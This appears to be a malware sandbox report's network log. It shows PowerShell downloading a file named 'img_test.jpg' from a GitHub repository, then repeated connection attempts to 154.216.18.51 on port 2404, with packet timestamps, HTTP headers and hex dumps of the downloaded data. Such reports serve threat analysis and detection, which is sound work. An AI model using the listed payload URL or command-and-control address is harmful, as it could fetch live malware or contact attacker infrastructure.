                                Oct 24, 2024 08:47:04.014595985 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.014642000 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.015001059 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.015028954 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.015069962 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.015077114 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.015103102 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.015122890 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.015435934 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.015455961 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.015496016 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.015501976 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.015531063 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.015539885 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.015847921 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.015872955 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.015912056 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.015918970 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.015944004 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.015964031 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.016361952 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.016386986 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.016419888 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.016426086 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.016454935 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.016463041 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.129600048 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.129626989 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.129728079 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.129738092 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.129786968 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.129853010 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.129877090 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.129928112 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.129934072 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.129998922 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.129998922 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.130192995 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.130218029 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.130251884 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.130259037 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.130283117 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.130297899 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.130549908 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.130592108 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.130611897 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.130616903 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.130634069 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.130656004 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.130985022 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.131009102 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.131038904 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.131043911 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.131074905 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.131097078 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.131349087 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.131371975 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.131412029 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.131428003 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.131439924 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.131468058 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.131704092 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.131728888 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.131766081 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.131772041 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.131798983 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.131818056 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.132110119 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.132150888 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.132169008 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.132174969 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.132203102 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.132221937 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.252682924 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.252703905 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.252836943 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.252850056 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.252926111 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.252964020 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.252979994 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.253082991 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.253091097 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.253143072 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.253196955 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.253211975 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.253256083 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.253262997 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.253277063 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.253309011 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.253319025 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.253331900 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.253349066 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.253392935 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.253536940 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.253551006 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.253603935 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.253609896 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.253664017 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.253664017 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.253802061 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.253815889 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.253892899 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.253899097 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.253952980 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.254354954 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.254385948 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.254426956 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.254434109 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.254467964 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.254489899 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.360558987 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.360599041 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.360637903 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.360650063 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.360686064 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.360728979 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.360788107 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.360802889 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.360848904 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.360855103 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.360928059 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.360951900 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.361140966 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.361155987 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.361213923 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.361222029 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.361296892 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.361479044 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.361493111 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.361550093 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.361557007 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.361610889 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.361697912 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.361751080 CEST44349701185.199.108.133192.168.2.7
                                Oct 24, 2024 08:47:04.361758947 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.361798048 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.362150908 CEST49701443192.168.2.7185.199.108.133
                                Oct 24, 2024 08:47:04.601689100 CEST497122404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:04.607021093 CEST240449712154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:04.607136011 CEST497122404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:04.614727974 CEST497122404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:04.620033026 CEST240449712154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:13.088211060 CEST240449712154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:13.088279009 CEST497122404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:13.088373899 CEST497122404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:13.093702078 CEST240449712154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:14.101149082 CEST497612404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:14.106599092 CEST240449761154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:14.109663963 CEST497612404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:14.135668993 CEST497612404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:14.141031027 CEST240449761154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:22.602260113 CEST240449761154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:22.602330923 CEST497612404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:22.602425098 CEST497612404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:22.607687950 CEST240449761154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:23.616539955 CEST498102404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:23.622433901 CEST240449810154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:23.622531891 CEST498102404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:23.626384974 CEST498102404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:23.632006884 CEST240449810154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:32.217153072 CEST240449810154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:32.217284918 CEST498102404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:32.217339993 CEST498102404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:32.223225117 CEST240449810154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:33.225946903 CEST498592404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:33.231414080 CEST240449859154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:33.231539011 CEST498592404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:33.235493898 CEST498592404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:33.241017103 CEST240449859154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:41.706044912 CEST240449859154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:41.706177950 CEST498592404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:41.706250906 CEST498592404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:41.711568117 CEST240449859154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:42.710146904 CEST499052404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:42.715538979 CEST240449905154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:42.715606928 CEST499052404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:42.720045090 CEST499052404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:42.725308895 CEST240449905154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:51.205203056 CEST240449905154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:51.205327988 CEST499052404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:51.205569983 CEST499052404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:51.210789919 CEST240449905154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:52.210730076 CEST499582404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:52.216521978 CEST240449958154.216.18.51192.168.2.7
                                Oct 24, 2024 08:47:52.216650963 CEST499582404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:52.220612049 CEST499582404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:47:52.226113081 CEST240449958154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:00.693723917 CEST240449958154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:00.693845034 CEST499582404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:00.714715004 CEST499582404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:00.721270084 CEST240449958154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:01.729289055 CEST499772404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:01.734812975 CEST240449977154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:01.734958887 CEST499772404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:01.738936901 CEST499772404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:01.745070934 CEST240449977154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:10.218863010 CEST240449977154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:10.219010115 CEST499772404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:10.219202042 CEST499772404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:10.224555969 CEST240449977154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:11.226432085 CEST499782404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:11.403736115 CEST240449978154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:11.406486988 CEST499782404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:11.410547018 CEST499782404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:11.415978909 CEST240449978154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:19.893599987 CEST240449978154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:19.893680096 CEST499782404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:19.893733025 CEST499782404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:19.899081945 CEST240449978154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:20.898013115 CEST499792404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:20.904438972 CEST240449979154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:20.904576063 CEST499792404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:20.909918070 CEST499792404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:20.915347099 CEST240449979154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:29.661618948 CEST240449979154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:29.661700964 CEST499792404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:29.661868095 CEST240449979154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:29.661910057 CEST499792404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:29.664356947 CEST499792404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:29.669838905 CEST240449979154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:30.680171013 CEST499802404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:30.686220884 CEST240449980154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:30.686323881 CEST499802404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:30.699448109 CEST499802404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:30.704722881 CEST240449980154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:39.444401979 CEST240449980154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:39.444681883 CEST499802404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:39.444794893 CEST499802404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:39.445017099 CEST240449980154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:39.445056915 CEST499802404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:39.450068951 CEST240449980154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:40.475378990 CEST499812404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:40.481055021 CEST240449981154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:40.481156111 CEST499812404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:40.487257957 CEST499812404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:40.492738008 CEST240449981154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:48.963697910 CEST240449981154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:48.963788033 CEST499812404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:48.963821888 CEST499812404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:48.969150066 CEST240449981154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:49.976119995 CEST499822404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:49.981987000 CEST240449982154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:49.982075930 CEST499822404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:49.985857010 CEST499822404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:49.991811037 CEST240449982154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:58.457576036 CEST240449982154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:58.457695961 CEST499822404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:58.457876921 CEST499822404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:58.463351965 CEST240449982154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:59.485735893 CEST499832404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:59.491271019 CEST240449983154.216.18.51192.168.2.7
                                Oct 24, 2024 08:48:59.491596937 CEST499832404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:59.495748043 CEST499832404192.168.2.7154.216.18.51
                                Oct 24, 2024 08:48:59.501209021 CEST240449983154.216.18.51192.168.2.7
                                • raw.githubusercontent.com
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.749699185.199.108.1334438C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-10-24 06:46:56 UTC117OUTGET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1
                                Host: raw.githubusercontent.com
                                Connection: Keep-Alive
                                2024-10-24 06:46:57 UTC889INHTTP/1.1 200 OK
                                Connection: close
                                Content-Length: 2578503
                                Cache-Control: max-age=300
                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                Content-Type: image/jpeg
                                ETag: "ba4b733aa1ad403bc9cacb2a172994a886bea7b08e7a7dfb33ae1618861cbf3e"
                                Strict-Transport-Security: max-age=31536000
                                X-Content-Type-Options: nosniff
                                X-Frame-Options: deny
                                X-XSS-Protection: 1; mode=block
                                X-GitHub-Request-Id: F760:27B52F:584797:61A26D:6719ED60
                                Accept-Ranges: bytes
                                Date: Thu, 24 Oct 2024 06:46:57 GMT
                                Via: 1.1 varnish
                                X-Served-By: cache-dfw-kdal2120099-DFW
                                X-Cache: MISS
                                X-Cache-Hits: 0
                                X-Timer: S1729752417.940714,VS0,VE342
                                Vary: Authorization,Accept-Encoding,Origin
                                Access-Control-Allow-Origin: *
                                Cross-Origin-Resource-Policy: cross-origin
                                X-Fastly-Request-ID: cd20b1a9060ad0bb915ff0ace831bd167f162fc8
                                Expires: Thu, 24 Oct 2024 06:51:57 GMT
                                Source-Age: 0
                                2024-10-24 06:46:57 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e1 00 16 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 00 00 00 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 00 09 0a ff c4 00 5f 10 00 01 03 03 03 02 04 03 06 04 03 06 03 01 01 21 01
                                Data Ascii: JFIF,,ExifMM*CCp"_!
                                2024-10-24 06:46:57 UTC16384INData Raw: c1 dc 0f e7 54 ac a7 04 aa 69 93 0d 3f c8 ef 4f ad ee 14 a4 41 54 fa 54 33 17 52 07 30 45 3a b7 b8 d8 48 93 3d e7 bd 54 9d 4c 96 32 c1 32 97 0a 76 9d c2 97 69 ed c9 24 1e 47 1f 5a 8a 45 cc ab 69 3e c0 f6 a5 db 7f 6f f5 4a 63 f5 a8 1c 19 2a 91 2a 9b 84 84 8f 9b 9e f1 e9 47 45 c4 a8 ca b8 f5 a8 d4 3a 95 81 07 bf 95 28 9b 9e 7e 6f c3 40 eb 13 91 22 ab 94 88 04 f6 ff 00 bf ca 8c 1f 49 50 83 51 ad dc c4 a8 11 1e 46 79 a3 0b a3 f8 89 24 9f 2a 1f 6d 8f bb 82 47 c4 e1 26 7b 8a 37 8d b8 f0 79 a8 c1 7c 79 98 03 b0 a1 6e f7 c3 59 25 44 f1 e9 4d ed 0d b8 93 37 02 48 04 11 41 f7 84 ef 1c 0a 8c 5d ee d3 09 30 26 8a e6 43 6f 3d 88 f4 34 5e d0 9c 91 2a 6e 40 02 48 04 fb d1 d1 76 15 b7 d3 91 de a1 55 7e 48 9f 33 e6 0f 7a f3 79 12 99 12 62 9d c1 f6 1f 71 3b f7 89 4f 04 49
                                Data Ascii: Ti?OATT3R0E:H=TL22vi$GZEi>oJc**GE:(~o@"IPQFy$*mG&{7y|ynY%DM7HA]0&Co=4^*n@HvU~H3zybq;OI
                                2024-10-24 06:46:57 UTC16384INData Raw: ee 11 86 b3 f0 dd 64 da 9d ca 42 52 ea 8a 54 b0 82 b0 a0 14 95 19 94 d7 46 7c 58 2f 22 9f 84 ae a2 2f 12 19 5d c3 18 c4 5c 3a b7 4f fc 26 5b b8 69 6b 5a 7f e7 48 1b 87 b8 35 15 f6 73 fd e2 c7 e0 7f 08 ab 97 1a 52 6e f3 b9 35 b2 a4 24 a4 94 07 12 83 bf d4 85 25 40 1f 48 ae 66 fd 23 fa 95 51 b1 4d eb da 76 be e6 15 aa fe 24 32 5f 66 c7 56 ad f4 16 98 c7 e7 75 ed 86 ae bd b3 c8 2e d3 2b 6c e5 ad c6 18 b8 b7 1b 79 a4 6c 0a 0b 2e 27 c3 5a 16 14 a4 43 73 07 92 3b 8b 21 78 a1 70 e2 00 80 d9 29 22 79 11 c5 62 7f 10 5f 0c 2e 75 f7 aa 9a 1f 3f 75 ad b3 58 dc 36 8e ba 17 c7 0a c5 b3 2a 17 0f 21 40 a0 b6 f4 05 a5 2a 81 bd 2b 2a 4f f8 42 49 35 b1 37 75 e2 ac a9 64 ab 7a 8c c7 69 26 4d 6b 69 34 be da d9 8e 11 9b 76 a7 dc e4 59 ab b2 be d2 01 11 3e 94 bb 57 bb 14 90 ad
                                Data Ascii: dBRTF|X/"/]\:O&[ikZH5sRn5$%@Hf#QMv$2_fVu.+lyl.'ZCs;!xp)"yb_.u?uX6*!@*+*OBI57udzi&Mki4vY>W
                                2024-10-24 06:46:57 UTC16384INData Raw: bc 9e 7d e9 74 c1 49 14 84 1d b4 c2 7f bd 28 d7 24 44 4c 52 68 32 83 f4 a3 36 7d e9 9a 09 0b 91 f2 f1 da 8f 33 20 0f 3a 49 0a dc 91 cc 45 1d be 41 f2 9a 01 b0 1c 18 13 e9 da 8e 15 22 28 80 42 23 be de 79 a3 02 26 09 32 69 0c 2c da b7 0a 13 02 4f 98 a4 90 36 40 99 e3 b5 19 d5 84 83 48 47 96 ad e4 89 ec 79 a4 dc ef c1 ef ef 42 55 03 bf 7a 4d 67 6c 9e d4 84 02 cf 3c f9 f1 44 24 a4 7d 3d e8 54 7e 69 9a 4d 4a 04 19 31 48 74 8f 28 6e 5f 97 6a 24 42 bf 2a 1d e0 1e f1 3e f4 02 24 f2 aa 41 20 5b e5 44 d1 f8 06 88 9f 94 c7 26 80 ac 7f d9 a2 51 7d c5 91 6d c9 83 cf f9 50 20 c2 07 03 f3 34 8a 94 22 09 fc a8 a5 d2 8e 0f 97 ef 44 36 e1 72 b9 48 1e 60 cd 11 63 9f f5 a4 f7 85 1f 31 f9 d0 82 37 0e 4c d3 8b 20 80 37 11 c4 11 5e d8 3d c5 00 e1 53 24 f1 da 8c 0f cb 48 24 11
                                Data Ascii: }tI($DLRh26}3 :IEA"(B#y&2i,O6@HGyBUzMgl<D$}=T~iMJ1Ht(n_j$B*>$A [D&Q}mP 4"D6rH`c17L 7^=S$H$
